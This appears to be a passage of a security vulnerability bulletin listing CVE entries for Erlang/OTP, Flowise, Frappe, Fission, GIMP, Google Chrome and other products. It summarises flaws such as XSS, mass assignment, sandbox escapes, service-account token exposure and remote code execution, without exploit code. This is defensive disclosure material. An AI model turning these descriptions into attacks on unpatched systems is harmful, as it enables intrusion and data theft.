| Erlang--OTP | Stack-based Buffer Overflow vulnerability in Erlang OTP (erl_interface) allows Stack-based Buffer Overflow. This vulnerability is associated with program file lib/erl_interface/src/misc/ei_printterm.c and program routine ei_s_print_term. The C function ei_s_print_term uses an internal 2000-character stack buffer to format terms. When called with an encoded Erlang term containing a very large integer (encoded representation exceeding 2000 characters), the buffer overflows. The overflow bytes are restricted to the ASCII values of 0-9 and A-F, which limits exploitation to Denial of Service. The companion function ei_print_term, which prints directly to a FILE instead of a memory buffer, does not contain this bug. This issue affects OTP from OTP 17.0 before 27.3.4.13, 28.5.0.2 and 29.0.2, corresponding to erl_interface from 3.7.16 before 5.5.2.1, 5.7.0.1 and 5.8.1. | 2026-06-10 | not yet calculated | CVE-2026-49760 |
| ETHER--Catalyst::Plugin::Authentication | Catalyst::Plugin::Authentication versions before 0.10_027 for Perl is susceptible to session fixation attacks. Catalyst::Plugin::Authentication does not automatically change the session id after authentication. An attacker that obtains a session id cookie can use this to impersonate the victim. | 2026-06-09 | not yet calculated | CVE-2009-10007 |
| ethyca--fides | Fides is an open-source privacy engineering platform. From version 2.33.0 to before version 2.84.5, there is a DOM-based XSS vulnerability in fides.js via the fides_description override. This issue has been patched in version 2.84.5. | 2026-06-08 | not yet calculated | CVE-2026-44541 |
| Everpure--FlashArray | A flaw exists in the FlashArray Purity management interface where an authenticated low-privileged user may, under specific conditions, access functionality beyond their assigned privileges. | 2026-06-09 | not yet calculated | CVE-2026-6444 |
| Everpure--FlashArray | A flaw exists in FlashArray Purity where insufficient filtering of certain data paths could expose sensitive information to an authenticated user with low privileges. | 2026-06-09 | not yet calculated | CVE-2026-6445 |
| FastapiAdmin--FastapiAdmin | An uncaught exception in the /application/job/update/{id} endpoint of FastapiAdmin v2.2.0 allows authenticated attackers with the module_task:job:update permission to cause a Denial of Service (DoS) via manipulating the func field of scheduled tasks. | 2026-06-09 | not yet calculated | CVE-2026-36724 |
| FastapiAdmin--FastapiAdmin | A markdown based cross-site scripting (XSS) vulnerability in the /system/notice/create endpoint of FastapiAdmin v2.2.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the notice_content parameter. | 2026-06-09 | not yet calculated | CVE-2026-36725 |
| FastapiAdmin--FastapiAdmin | A markdown based cross-site scripting (XSS) vulnerability in the AI assistant chat function of FastapiAdmin v2.2.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into a chat message. | 2026-06-09 | not yet calculated | CVE-2026-36728 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.23.0, Fission runtime pods were created with ServiceAccountName: fission-fetcher, and the fission-fetcher ServiceAccount was granted namespace-wide get on secrets and configmaps (it needs that to load function code, env vars, and config). The runtime pod's automounted token was reachable from inside the user's function container at /var/run/secrets/kubernetes.io/serviceaccount/token, so user-supplied function code inherited the same Kubernetes API privileges and could read any secret or configmap in the function's namespace - far beyond the Function.spec.secrets allowlist that the function specification suggests. This issue has been patched in version 1.23.0. | 2026-06-10 | not yet calculated | CVE-2026-46617 |
| fission--fission | Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.23.0, before the round-1 security sweep, pkg/builder/builder.go passed Environment.spec.builder.command directly into exec.Command(...) after a strings.Fields split, with no validation of the executable path or its arguments. A user who could create or update Environment CRDs in a namespace observed by the buildermgr could thereby point the builder pod at any executable inside the builder image (e.g. /bin/sh -c '...') and execute arbitrary code in the builder pod context. This issue has been patched in version 1.23.0. | 2026-06-10 | not yet calculated | CVE-2026-46618 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, a mass assignment vulnerability exists in the variable update endpoint of FlowiseAI. The endpoint allows authenticated users to modify server-controlled properties such as workspaceId, createdDate, and updatedDate when updating a variable resource. Due to missing server-side validation and authorization checks, an attacker can manipulate the workspaceId field and reassign variables to arbitrary workspaces. This behavior may break tenant isolation in multi-workspace environments. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-42861 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, a mass assignment vulnerability exists in the tool update endpoint of FlowiseAI. The endpoint allows authenticated users to modify server-controlled properties such as workspaceId, createdDate, and updatedDate when updating a tool resource. Due to missing server-side validation and authorization checks, an attacker can manipulate the workspaceId field and reassign tools to arbitrary workspaces. This breaks tenant isolation in multi-workspace environments. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-42862 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, a mass assignment vulnerability exists in the chatflow update endpoint of FlowiseAI. The endpoint allows clients to modify server-controlled properties such as deployed, isPublic, workspaceId, createdDate, and updatedDate when updating a chatflow object. Due to missing server-side validation and authorization checks, an authenticated user can manipulate internal attributes of a chatflow and reassign it to another workspace. This allows cross-workspace resource reassignment and unauthorized modification of deployment and visibility settings. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-42863 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, the checkBasicAuth endpoint validates credentials in plaintext without rate limiting and with direct comparison. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-46440 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, a mass assignment vulnerability exists in the assistant update endpoint of FlowiseAI. The endpoint allows authenticated users to modify server-controlled properties such as workspaceId, createdDate, and updatedDate when updating an assistant resource. Due to missing server-side validation and authorization checks, an attacker can manipulate the workspaceId field and reassign assistants to arbitrary workspaces. This breaks tenant isolation in multi-workspace environments. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-46441 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, POST /api/v1/node-custom-function lacks route-level authorization, allowing any authenticated user or API key to submit arbitrary JavaScript to the Custom JS Function node. When E2B_APIKEY is not configured - the common deployment case - Flowise executes this code inside a NodeVM sandbox. This sandbox can be escaped, allowing an attacker to reach the host process object and execute system commands via child_process. The result is authenticated remote code execution on the Flowise server host. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-46442 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, when credentials are fetched with a credentialName filter parameter, the encryptedData field is not stripped from the response. The code properly omits encryptedData when no filter is used but fails to do so when a filter is used. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-46443 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, all CRUD endpoints for OpenAI Assistants Vector Store have no authentication middleware and the route path /api/v1/openai-assistants-vector-store is not in WHITELIST_URLS. However, it is also not protected by the main auth middleware when accessed via API key - the route requires API key auth (not whitelisted), but no permission checks exist on any operation. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-46444 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, assistant create and update mass-assignment allows cross-workspace assistant takeover. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-46475 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, CustomTemplate create and update mass-assignment allows cross-workspace template takeover. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-46476 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, dataset create and update mass-assignment allows cross-workspace dataset takeover. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-46477 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, DatasetRow create and update mass-assignment allows cross-workspace row takeover. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-46478 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, evaluation create and update mass-assignment allows cross-workspace evaluation takeover. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-46479 |
| FlowiseAI--Flowise | Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, evaluator create and update mass-assignment allows cross-workspace evaluator takeover. This issue has been patched in version 3.1.2. | 2026-06-08 | not yet calculated | CVE-2026-46480 |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to versions 15.106.0 and 16.16.0, there is a possible SQL Injection via get_blog_list. This issue has been patched in versions 15.106.0 and 16.16.0. | 2026-06-12 | not yet calculated | CVE-2026-41581 |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to version 15.106.0, a stored XSS vulnerability in the user profile image section allows an attacker to execute malicious scripts in the browsers of other users. This issue has been patched in version 15.106.0. | 2026-06-12 | not yet calculated | CVE-2026-44205 |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to versions 15.107.2 and 16.17.4, DB Schema Enumeration is possible through exploiting an endpoint. This issue has been patched in versions 15.107.2 and 16.17.4. | 2026-06-12 | not yet calculated | CVE-2026-44206 |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to versions 15.107.0 and 16.17.0, an IDOR vulnerability allows authenticated users to access other users' email configuration details. This issue has been patched in versions 15.107.0 and 16.17.0. | 2026-06-12 | not yet calculated | CVE-2026-44207 |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to versions 15.107.0 and 16.17.0, lack of validations in the "submit_discussion()" endpoint allows for unauthorized access to resources. This issue has been patched in versions 15.107.0 and 16.17.0. | 2026-06-12 | not yet calculated | CVE-2026-44208 |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to versions 15.107.2 and 16.17.4, any authenticated user can reset onboarding for all users in the system. This issue has been patched in versions 15.107.2 and 16.17.4. | 2026-06-12 | not yet calculated | CVE-2026-44975 |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to version 16.17.4, any user can modify any field in any Onboarding Step record. This issue has been patched in version 16.17.4. | 2026-06-12 | not yet calculated | CVE-2026-44976 |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to version 16.17.4, any authenticated user can access private files by guessing the file path. This issue has been patched in version 16.17.4. | 2026-06-12 | not yet calculated | CVE-2026-47182 |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to versions 15.106.0 and 16.16.0, stored XSS in Note was possible due to lack of sanitization. This issue has been patched in versions 15.106.0 and 16.16.0. | 2026-06-12 | not yet calculated | CVE-2026-47739 |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to versions 15.107.0 and 16.17.0, a lack of permission checks in these endpoints allowed unauthorized access to resources. This issue has been patched in versions 15.107.0 and 16.17.0. | 2026-06-12 | not yet calculated | CVE-2026-50026 |
| frappe--frappe | Frappe is a full-stack web application framework. Prior to versions 15.107.2 and 16.17.4, there is a stored XSS vulnerablity in Frappe Report/List View. This issue has been patched in versions 15.107.2 and 16.17.4. | 2026-06-12 | not yet calculated | CVE-2026-53568 |
| frappe--lms | Frappe Learning Management System (LMS) is a learning system that helps users structure their content. Prior to version 2.53.0, an authenticated user could supply specially crafted content in certain user-editable fields that, when surfaced in page metadata, caused visitors' browsers to navigate to an attacker-chosen URL. This issue has been patched in version 2.53.0. | 2026-06-09 | not yet calculated | CVE-2026-46546 |
| GIMP--GIMP | GIMP HDR File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of HDR files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28618. | 2026-06-10 | not yet calculated | CVE-2026-2049 |
| Google Cloud--Dialogflow CX | A Missing Authorization vulnerability in the playbook import functionality in Dialogflow CX on Google Cloud Platform allows an authenticated user with specific roles to escalate privileges and potentially take over a GCP project using a maliciously crafted playbook import. This vulnerability was patched on 15 March 2026, and no customer action is needed. | 2026-06-11 | not yet calculated | CVE-2026-4764 |
| Google--Chrome | Use after free in Ozone in Google Chrome prior to 149.0.7827.103 allowed a local attacker to potentially exploit heap corruption via physical access to the device. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11628 |
| Google--Chrome | Use after free in Ozone in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11629 |
| Google--Chrome | Use after free in File Input in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11630 |
| Google--Chrome | Use after free in Aura in Google Chrome on Windows prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11631 |
| Google--Chrome | Use after free in TabStrip in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11632 |
| Google--Chrome | Use after free in Bluetooth in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code via a malicious peripheral. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11633 |
| Google--Chrome | Use after free in Gamepad in Google Chrome on Windows prior to 149.0.7827.103 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11634 |
| Google--Chrome | Use after free in Bluetooth in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11635 |
| Google--Chrome | Use after free in Autofill in Google Chrome on Windows prior to 149.0.7827.103 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11636 |
| Google--Chrome | Use after free in Views in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11637 |
| Google--Chrome | Use after free in Printing in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11638 |
| Google--Chrome | Use after free in Compositing in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11639 |
| Google--Chrome | Integer overflow in libyuv in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11640 |
| Google--Chrome | Use after free in Bluetooth in Google Chrome on Windows prior to 149.0.7827.103 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11641 |
| Google--Chrome | Use after free in Web Apps in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11642 |
| Google--Chrome | Use after free in Proxy in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code via malicious network traffic. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11643 |
| Google--Chrome | Use after free in Views in Google Chrome on Linux prior to 149.0.7827.103 allowed an attacker who convinced a user to install a malicious extension to execute arbitrary code via a crafted Chrome Extension. (Chromium security severity: Critical) | 2026-06-08 | not yet calculated | CVE-2026-11644 |
| Google--Chrome | Out of bounds read and write in V8 in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11645 |
| Google--Chrome | Use after free in ViewTransitions in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11646 |
| Google--Chrome | Use after free in Printing in Google Chrome on Android prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11647 |
| Google--Chrome | Use after free in FullScreen in Google Chrome on Windows prior to 149.0.7827.103 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11648 |
| Google--Chrome | Use after free in V8 in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11649 |
| Google--Chrome | Use after free in V8 in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11650 |
| Google--Chrome | Use after free in Network in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11651 |
| Google--Chrome | Use after free in Extensions in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11652 |
| Google--Chrome | Inappropriate implementation in Extensions in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11653 |
| Google--Chrome | Use after free in CameraCapture in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11654 |
| Google--Chrome | Integer overflow in Media in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11655 |
| Google--Chrome | Use after free in ServiceWorker in Google Chrome prior to 149.0.7827.103 allowed an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted Chrome Extension. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11656 |
| Google--Chrome | Use after free in Payments in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11657 |
| Google--Chrome | Insufficient validation of untrusted input in Extensions in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11658 |
| Google--Chrome | Integer overflow in UI in Google Chrome on Linux prior to 149.0.7827.103 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11659 |
| Google--Chrome | Insufficient validation of untrusted input in New Tab Page in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11660 |
| Google--Chrome | Use after free in Views in Google Chrome on Windows prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11661 |
| Google--Chrome | Type Confusion in Bindings in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11662 |
| Google--Chrome | Use after free in Skia in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11663 |
| Google--Chrome | Use after free in Payments in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11664 |
| Google--Chrome | Out of bounds read in Dawn in Google Chrome on Windows prior to 149.0.7827.103 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11665 |
| Google--Chrome | Insufficient validation of untrusted input in Input in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11666 |
| Google--Chrome | Out of bounds read in WebRTC in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the GPU process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11667 |
| Google--Chrome | Uninitialized Use in Codecs in Google Chrome on Linux, ChromeOS prior to 149.0.7827.103 allowed a remote attacker to leak cross-origin data via a crafted video file. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11668 |
| Google--Chrome | Out of bounds read in Media in Google Chrome on ChromeOS prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11669 |
| Google--Chrome | Use after free in PDF in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted PDF file. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11670 |
| Google--Chrome | Use after free in Navigation in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11671 |
| Google--Chrome | Heap buffer overflow in GPU in Google Chrome on Android prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11672 |
| Google--Chrome | Use after free in InterestGroups in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11673 |
| Google--Chrome | Use after free in Guest View in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11674 |
| Google--Chrome | Out of bounds read in Skia in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11675 |
| Google--Chrome | Insufficient validation of untrusted input in Dawn in Google Chrome on Linux and ChromeOS prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11676 |
| Google--Chrome | Race in Network in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker who had compromised the network process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11677 |
| Google--Chrome | Integer overflow in libyuv in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11678 |
| Google--Chrome | Use after free in Codecs in Google Chrome on Windows prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11679 |
| Google--Chrome | Use after free in Media in Google Chrome on Windows prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11680 |
| Google--Chrome | Use after free in Ozone in Google Chrome on Linux prior to 149.0.7827.103 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11681 |
| Google--Chrome | Inappropriate implementation in Views in Google Chrome on Linux prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11682 |
| Google--Chrome | Use after free in WebCodecs in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11683 |
| Google--Chrome | Insufficient policy enforcement in Network in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the utility process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11684 |
| Google--Chrome | Inappropriate implementation in MediaCapture in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11685 |
| Google--Chrome | Insufficient validation of untrusted input in Dawn in Google Chrome on macOS prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11686 |
| Google--Chrome | Use after free in Dawn in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11687 |
| Google--Chrome | Inappropriate implementation in SVG in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11688 |
| Google--Chrome | Insufficient policy enforcement in Passwords in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11689 |
| Google--Chrome | Out of bounds read and write in Media in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11690 |
| Google--Chrome | Insufficient validation of untrusted input in New Tab Page in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11691 |
| Google--Chrome | Use after free in Read Anything in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11692 |
| Google--Chrome | Inappropriate implementation in Plugins in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11693 |
| Google--Chrome | Use after free in ServiceWorker in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11694 |
| Google--Chrome | Inappropriate implementation in Passwords in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11695 |
| Google--Chrome | Uninitialized Use in Video in Google Chrome on Windows prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11696 |
| Google--Chrome | Insufficient validation of untrusted input in UI in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11697 |
| Google--Chrome | Use after free in Bluetooth in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11698 |
| Google--Chrome | Use after free in Bluetooth in Google Chrome on Mac prior to 149.0.7827.103 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-08 | not yet calculated | CVE-2026-11699 |
| Google--Chrome | Use after free in Tracing in Google Chrome prior to 149.0.7827.103 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-08 | not yet calculated | CVE-2026-11700 |
